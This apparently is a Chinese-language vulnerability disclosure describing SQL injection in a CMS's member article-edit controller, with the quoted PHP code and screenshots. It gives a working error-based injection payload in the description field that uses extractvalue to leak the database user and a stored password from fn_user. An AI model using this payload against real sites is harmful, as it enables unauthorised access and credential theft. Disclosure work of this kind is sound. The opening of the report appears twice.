### 简要描述: 这次让我先呵呵!!! ### 详细说明: 会员中心,文章-先发表一篇文章,然后去修改,看看修改的代码 controllers/member/ContentController.php ``` public function editAction() { 。。。。 if ($this->post('submit')) { $_data = $data; unset($data); $data = $this->post('data'); /**print_r($data); exit();**/ if (empty($data['title'])) { $this->memberMsg(lang('m-con-13')); } if ($data['catid'] != $catid && $modelid != $this->cats[$data['catid']]['modelid']) { $this->memberMsg(lang('m-con-35')); } $this->checkFields($fields, $data, 2); $data['id'] = $id; $data['sysadd'] = 0; $data['status'] = !isset($this->group['postverify']) || $this->group['postverify'] ? 3 : 1; $data['userid'] = $this->memberinfo['id']; $data['modelid'] = (int)$modelid; $data['username'] = $this->memberinfo['username']; $data['inputtime'] = $_data['inputtime']; $data['updatetime'] = time(); $result = $this->content->member($id, $this->cmodel[$modelid]['tablename'], $data); ``` post提交修改文章,data数组并没有任何过滤,那么可以尝试在文章内容中注入,给描述部分添加一个单引号 [<img...
### 简要描述: 这次让我先呵呵!!! ### 详细说明: 会员中心,文章-先发表一篇文章,然后去修改,看看修改的代码 controllers/member/ContentController.php ``` public function editAction() { 。。。。 if ($this->post('submit')) { $_data = $data; unset($data); $data = $this->post('data'); /**print_r($data); exit();**/ if (empty($data['title'])) { $this->memberMsg(lang('m-con-13')); } if ($data['catid'] != $catid && $modelid != $this->cats[$data['catid']]['modelid']) { $this->memberMsg(lang('m-con-35')); } $this->checkFields($fields, $data, 2); $data['id'] = $id; $data['sysadd'] = 0; $data['status'] = !isset($this->group['postverify']) || $this->group['postverify'] ? 3 : 1; $data['userid'] = $this->memberinfo['id']; $data['modelid'] = (int)$modelid; $data['username'] = $this->memberinfo['username']; $data['inputtime'] = $_data['inputtime']; $data['updatetime'] = time(); $result = $this->content->member($id, $this->cmodel[$modelid]['tablename'], $data); ``` post提交修改文章,data数组并没有任何过滤,那么可以尝试在文章内容中注入,给描述部分添加一个单引号 [<img src="https://images.seebug.org/upload/201506/28115044a6a2bed5143bb7f1aad8a623bc8e43a7.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/28115044a6a2bed5143bb7f1aad8a623bc8e43a7.png) 接着提交后就会报错 [<img src="https://images.seebug.org/upload/201506/28115225ae58cc9c2b3a35a58f4906ba75a12da7.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/28115225ae58cc9c2b3a35a58f4906ba75a12da7.png) 那么继续在描述中插入poc ``` a',`sysadd` = '0',`status` = '1',`userid` = '1',`modelid` = '1',`username` = 'woc11123ao',`inputtime` = '1435460076',`updatetime` = '1435461373',`url` = 'q' WHERE id=41 and extractvalue(1,concat(0x7e,user(),0x7e,(select password from fn_user limit 1)))# ``` [<img src="https://images.seebug.org/upload/201506/28115412ca820a01bed7ad0a7c78ad160ed9507b.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/28115412ca820a01bed7ad0a7c78ad160ed9507b.png) ### 漏洞证明: [<img src="https://images.seebug.org/upload/201506/281154243529fe9c48d08f0b41ba0ba7a8179f3c.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/281154243529fe9c48d08f0b41ba0ba7a8179f3c.png)
